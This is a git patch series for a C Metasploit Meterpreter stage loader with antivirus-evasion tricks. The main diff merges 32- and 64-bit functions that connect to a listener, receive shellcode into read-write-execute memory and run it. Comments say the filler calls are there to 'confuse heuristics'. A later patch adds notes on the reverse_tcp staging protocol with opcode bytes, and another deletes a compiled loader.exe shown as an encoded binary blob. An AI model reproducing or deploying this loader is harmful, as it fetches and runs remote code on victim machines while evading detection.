From 0b13a6180337a3091fa8395c2146b9c0d3f787c4 Mon Sep 17 00:00:00 2001
From: Arthur Moore <Arthur.Moore.git@cd-net.net>
Date: Tue, 31 Dec 2013 10:20:52 -0500
Subject: [PATCH 1/3] reverse_tcp_meterpreter(x64) Cleanup/Major Bug fix

Last commit always ran reverse_tcp_meterpreter_x64.
This commit folds that function into the 32 bit version.

Yay for code reuse.
---
 main-timeobfs.c | 91 +++++++++++--------------------------------------
 1 file changed, 19 insertions(+), 72 deletions(-)

diff --git a/main-timeobfs.c b/main-timeobfs.c
index 7d4fe25..88b762a 100644
--- a/main-timeobfs.c
+++ b/main-timeobfs.c
@@ -132,67 +132,23 @@ int sandbox_evasion(){
 
 
 //The metasploit-loader extracted into its own function.
+//Works with 32 or 64 bit meterpreter depending on if ISX64 is defined or not
 void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){
 	ULONG32 size;
 	char * buffer;
 	void (*function)();
-	winsock_init();
+	#ifndef ISX64
+		//Not 64 bit
+		int movCmdSize = 1;
+		int ptrSize = 4;
+		char movCmd[] = {0xBF};
+	#else
+		//Is 64 bit
+		int movCmdSize = 2;
+		int ptrSize = 8;
+		char movCmd[] = {0x48,0xBF};
+	#endif
 
-	//start the socket homie
-	SOCKET my_socket = wsconnect(listenerIP, listenerPort);
-	//receive 4 bytes which indicates the size of the next payload
-	int count = recv(my_socket, (char *)&size, 4, 0);
-	//check for issues
-	if (count != 4 || size <= 0)
-		Kick(my_socket, "bad length value\n");
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation
-	genlol();
-	//================================	
-
-	//allocate the RWX buffer
-	buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation
-	genlol();
-	//================================
-
-	//check the buffer for issues
-	if (buffer == NULL)
-		Kick(my_socket, "bad buffer\n");
-	//puts mov on to the front of the buffer
-	buffer[0] = 0xBF;
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation	
-	genlol();
-	//================================
-
-	//copies the socket pointer onto the buffer after 0xBF
-	//see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
-	memcpy(buffer + 1, &my_socket, 4);
-
-	//================================
-	//burn out the clock, and confuse heuristics with some random number generation
-	genlol();
-	//================================
-
-	//receives the rest of the data from the socket (based on the size received before)
-	count = recv_all(my_socket, buffer + 5, size);
-	//cast the buffer as a function?
-	function = (void (*)())buffer;
-	//execute dat meterpreter
-	function();
-}
-
-
-//The metasploit-loader for 64 bit systems
-void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){
-	ULONG32 size;
-	char * buffer;
-	void (*function)();
 	winsock_init();
 
 	//start the socket homie
@@ -209,7 +165,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){
 	//================================	
 
 	//allocate the RWX buffer
-	buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	buffer = VirtualAlloc(0, size + movCmdSize + ptrSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
 	//================================
 	//burn out the clock, and confuse heuristics with some random number generation
@@ -220,17 +176,16 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){
 	if (buffer == NULL)
 		Kick(my_socket, "bad buffer\n");
 	//puts mov on to the front of the buffer
-	buffer[0] = 0x48;
-	buffer[1] = 0xBF;
+	memcpy(buffer, movCmd, movCmdSize);
 
 	//================================
 	//burn out the clock, and confuse heuristics with some random number generation	
 	genlol();
 	//================================
 
-	//copies the socket pointer onto the buffer after 0x48 0xBF
+	//copies the socket pointer onto the buffer after the move command
 	//see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
-	memcpy(buffer + 2, &my_socket, 8);
+	memcpy(buffer + movCmdSize, &my_socket, ptrSize);
 
 	//================================
 	//burn out the clock, and confuse heuristics with some random number generation
@@ -238,7 +193,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){
 	//================================
 
 	//receives the rest of the data from the socket (based on the size received before)
-	count = recv_all(my_socket, buffer + 10, size);
+	count = recv_all(my_socket, buffer + movCmdSize + ptrSize, size);
 	//cast the buffer as a function?
 	function = (void (*)())buffer;
 	//execute dat meterpreter
@@ -254,17 +209,9 @@ int main(int argc, char *argv[]) {
 
 	//If command line parameters are given, use those instead of defaults.
 	if(argc == 3){
-		#ifdef ISX64
-			reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));
-		#else
-			reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));
-		#endif
+		reverse_tcp_meterpreter(argv[1], atoi(argv[2]));
 	}else{
-		#ifdef ISX64
-			reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);
-		#else
-			reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);
-		#endif
+		reverse_tcp_meterpreter(defaultListenerIP, defaultListenerPort);
 	}
 
 	return 0;

From abece8a42b6ac3e7d9a2c5f14aa9b2e1141ab58d Mon Sep 17 00:00:00 2001
From: Arthur Moore <Arthur.Moore.git@cd-net.net>
Date: Thu, 27 Feb 2014 17:25:13 -0500
Subject: [PATCH 2/3] Added an explanation of how reverse_tcp works

---
 custom_meterp_bind.txt | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 custom_meterp_bind.txt

diff --git a/custom_meterp_bind.txt b/custom_meterp_bind.txt
new file mode 100644
index 0000000..765e8d9
--- /dev/null
+++ b/custom_meterp_bind.txt
@@ -0,0 +1,21 @@
+* connect to the handler
+* read a 4-byte length
+* allocate a length-byte buffer
+* mark it as writable and executable (on Windows you'll need VirtualProtect for this)
+* read length bytes into that buffer
+* jump to the buffer. easiest way to do this in C is cast it to a function pointer and call it.
+
+via egypt
+
+Assuming x86 arch, you have to make sure that the EDI register contains your socket descriptor (the value of the ConnectSocket variable). You can do this via inline asm, but it might be easier to just prepend the 5 bytes for setting it to your shellcode:
+
+BF 78 56 34 12   mov edi, 0x12345678
+
+For 64 bit, you have to use the RDI register (and need 10 bytes):
+
+48 BF 78 56 34 12 00 00 00 00    mov rdi, 0x12345678
+
+PS: This is the reason why the calling convention within Metasploit is
+called "sockedi"
+
+Via Michael Schierl
\ No newline at end of file

From 8f2de3fbe20521ba6466b24844edacee40b96889 Mon Sep 17 00:00:00 2001
From: Arthur Moore <Arthur.Moore.git@cd-net.net>
Date: Thu, 1 Jan 2015 16:00:14 -0500
Subject: [PATCH 3/3] Don't bother tracking compiled code.

---
 .gitignore |   8 +++++++-
 loader.exe | Bin 24868 -> 0 bytes
 2 files changed, 7 insertions(+), 1 deletion(-)
 delete mode 100755 loader.exe

diff --git a/.gitignore b/.gitignore
index 092f515..1702a3a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,9 @@
+#################
+## Executable
+#################
+.exe
+.o
+
 #################
 ## Eclipse
 #################
@@ -165,4 +171,4 @@ pip-log.txt
 # sublime text project files
 
 *.sublime-project
-*.sublime-workspace
\ No newline at end of file
+*.sublime-workspace
diff --git a/loader.exe b/loader.exe
deleted file mode 100755
index 05fa672f46dff1a4fcfbeb28b67d4883b62af200..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 24868
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